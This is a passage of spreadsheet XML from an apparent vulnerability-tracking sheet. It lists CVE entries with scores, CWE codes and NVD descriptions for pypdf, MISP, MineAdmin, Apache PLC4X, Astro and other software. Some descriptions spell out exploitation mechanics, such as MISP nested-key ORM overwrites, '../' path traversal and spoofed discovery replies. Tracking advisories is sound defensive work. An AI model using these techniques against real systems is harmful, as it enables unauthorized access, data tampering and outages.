      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.18.1, a crafted PDF can place unusually large source-code or destination-string tokens in a font /ToUnicode mapping, causing pypdf/_cmap.py parse_bfchar to decode and retain oversized values during operations such as text extraction and consume excessive memory. This is a second follow-up to earlier /ToUnicode resource-consumption fixes and is limited to the remaining token-length path. This issue is fixed in version 6.18.1.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102995</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102996</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.18.1, a crafted PDF can provide a TrueType or Type1 simple font with an unusually large /Widths array, causing pypdf/_font.py Font._collect_tt_t1_character_widths to process entries beyond the 256 character codes meaningful for a simple font and consume excessive memory during operations such as text extraction. This issue is fixed in version 6.18.1.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102996</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102997</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.18.1, a crafted PDF containing a partially malformed /FlateDecode stream with padded data can force pypdf/filters.py to use inefficient byte-by-byte decompression while the earlier recovery counter fails to advance for bytes that successfully decode, causing long runtimes and application unavailability. This is a residual issue after the malformed FlateDecode recovery fix. This issue is fixed in version 6.18.1.</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102997</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102998</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.19.0, a crafted PDF with form field values can cause pypdf/generic/_appearance_stream.py appearance-stream generation to repeat invariant selection-data work inside a loop when an application updates fields with flattening enabled, resulting in excessive runtimes and application unavailability. This issue is fixed in version 6.19.0.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102998</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102999</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.19.0, a crafted PDF containing many embedded files can cause the dictionary-based attachments API in pypdf/_doc_common.py to reparse the full attachment list for each content lookup, producing repeated work and long runtimes when an application accesses the embedded-file mapping. This issue is fixed in version 6.19.0.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102999</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103000</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.19.0, a crafted PDF can provide unusually large alphabetical page-label values that cause pypdf/_page_labels.py to generate strings beyond a reasonable page-label length when an application retrieves document page labels, consuming excessive memory and potentially making the application unavailable. This issue is fixed in version 6.19.0.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103000</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103235</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-915</t>
        </is>
      </c>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>MISP contains a mass assignment vulnerability in the event delegation feature. When a user with delegation permission submits a delegation request, the application authorized the user against the event identified in the URL but then persisted the entire submitted record, including caller-supplied fields such as the primary key and event_id.
An authenticated attacker could inject a primary key or event_id into the delegation payload to retarget an existing delegation record to any event on the instance. Because a delegation row grants the requesting organisation read access to the event it references, this effectively granted read access to arbitrary events belonging to other organisations. If the target organisation subsequently accepted the delegation, ownership of the event was transferred and the original record was deleted.
Preconditions:
- An authenticated user with the delegation permission (perm_delegate)
- The MISP.delegation server setting must be enabled
Impact:
- Confidentiality: read access to any event on the instance
- Integrity: overwriting existing delegation records and transferring event ownership
Affected versions: MISP &lt; 2.5.48</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103235</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47097</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>AJA HELO Plus firmware before 2.1.7 contains an information disclosure vulnerability that allows unauthenticated attackers to decrypt sensitive diagnostics bundles by exploiting a static AES passphrase embedded in obfuscated form within the firmware. Attackers can reverse engineer the publicly available firmware image to recover the shared passphrase and decrypt diagnostics export bundles retrieved from the unauthenticated diagnostics endpoint on any affected device, exposing highly sensitive server information.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47097</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55224</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S45" s="5" t="inlineStr">
        <is>
          <t>MineAdmin is a ready-to-use backend management system suitable for quickly building website backends, operation platforms, permission centers, internal management systems, CMS, CRM, OA, ERP and other business applications. Prior to version 3.2.0-alpha.2, the app-store plugin service concatenates unsanitized user-supplied identifier values directly into file system paths. An attacker can use path traversal sequences (e.g., ../) to read, install, or uninstall plugins from arbitrary directories, and potentially execute arbitrary composer commands. This issue has been patched in version 3.2.0-alpha.2.</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55224</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97150</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t>When converting baserCMS4-style addons to baserCMS5-style ones,
BcAddonMigrator includes "config.php" from the addon, which means the PHP code in the file is executed.
Arbitrary files on the system may be read or deleted by an administrative user.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97150</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102511</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-248, CWE-835, CWE-940</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>Improper Verification of Source of a Communication Channel in the ADS discovery of the Go implementation of Apache PLC4X (PLC4Go) allows an attacker able to send UDP datagrams to the discovering host to redirect subsequent connections to an arbitrary, attacker-chosen address. The discovery result's connection 
address was derived from the AmsNetId claimed in the response body rather than from the datagram's actual source address. One spoofed discovery response can therefore insert an inventory entry pointing at any host, including hosts outside the local network, and an application that connects to discovered devices
will open its ADS session, including any configured route credentials, to that host.
Additionally, discovery listeners in both implementations can be disabled by a single malformed datagram:
- In PLC4Go ADS discovery, a short version block causes a panic that ends the listener for the rest of the discovery call, so legitimate devices answering afterwards are not reported.
- In PLC4J, the ADS and EtherNet/IP discoverers stop on an unhandled exception from a malformed response.
- The PLC4J Modbus discoverer can be made to spin indefinitely, consuming a CPU core, by a scanned host that sends a partial response.
Exploitation requires the application to invoke the discovery API, which is opt-in, and for the connection redirect, to act on the discovered items.
This issue affects Apache PLC4X: PLC4Go from 0.11.0 before 1.0.0; PLC4J ADS and Modbus drivers from 0.10.0 before 1.0.0; PLC4J EtherNet/IP driver from 0.11.0 before 1.0.0. PLC4Go is consumed as the Go module github.com/apache/plc4x/plc4go; versions refer to the corresponding Apache PLC4X releases.
Users are recommended to upgrade to version 1.0.0, which fixes the issue. Version 1.0.0 derives the connection address from the datagram's source address and logs a warning when the claimed AmsNetId disagrees with it.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102511</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103237</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-639</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>MISP contains an improper input validation vulnerability in its ORM save path. When a user submits data through various endpoints (attribute add/edit, event edit, free-text import, sighting capture, shadow attribute proposal, event report creation, object reference add, user admin edit), the application sanitizes the flat record by stripping the primary key and pinning the event_id or object_id to the caller's context. However, the underlying ORM's set() method gives priority to a nested key whose name matches the model alias and discards the outer scalar fields.
An authenticated user with basic write permissions can exploit this by embedding a nested block under the model alias key inside their request. The sanitization logic (id removal, event_id pinning) is applied to the outer record, but the ORM binds to the inner record instead, which carries an attacker-chosen id and event_id. This allows the attacker to overwrite, re-parent, or soft-delete rows belonging to other organizations or events they have no read access to.
Impact:
- Cross-tenant data integrity compromise (attribute values rewritten, objects re-parented to attacker events, rows soft-deleted)
- Affects multiple entity types: Attribute, Object, EventReport, Sighting, AttributeTag, ShadowAttribute
- Requires only a low-privilege authenticated account with perm_add
Affected versions: &lt;2.5.48</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103237</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46711</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>Soft Machine is a Virtual Machine–based agentic development environment / Cloud OS. In versions 0.2.247 and prior, the workspace HTTP service that listens on 0.0.0.0:8080 inside each sm-ws-* Fly Machine exposes endpoints (/health, /file/&lt;path&gt;, /archive/&lt;dir&gt;) without any authentication or origin check. Any host that can reach TCP/8080 on a workspace can read arbitrary files under that workspace's /workspace root and download whole project trees as tar archives. Because every workspace shares the same Fly private 6PN and resolves all peer addresses via the unauthenticated _instances.internal TXT record, every other sm-ws-* machine on the same Fly app/org is a reachable, unauthenticated attacker — the trust boundary (workspace owner ↔ everyone-else) is missing. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46711</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102984</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr">
        <is>
          <t>npm:@astrojs/node</t>
        </is>
      </c>
      <c r="M50" s="5" t="inlineStr">
        <is>
          <t>11.1.3</t>
        </is>
      </c>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>Astro is a web framework for content-driven websites. Prior to 11.1.3, the @astrojs/node adapter builds a request URL from the Host header, and a malformed port can make that URL invalid. The recovery path reuses the same malformed host and throws an uncaught TypeError: Invalid URL before routing begins. In the default standalone configuration, the request returns an HTTP 500 response and the server continues running, but when staticHeaders is enabled the synchronous handler does not catch the exception and the Node process terminates. Proxies and CDNs that reject malformed Host headers prevent this path from reaching the origin. The issue affects availability only and does not expose data or permit code execution. This issue is fixed in version 11.1.3.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102984</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102990</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr">
        <is>
          <t>node.js, express</t>
        </is>
      </c>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
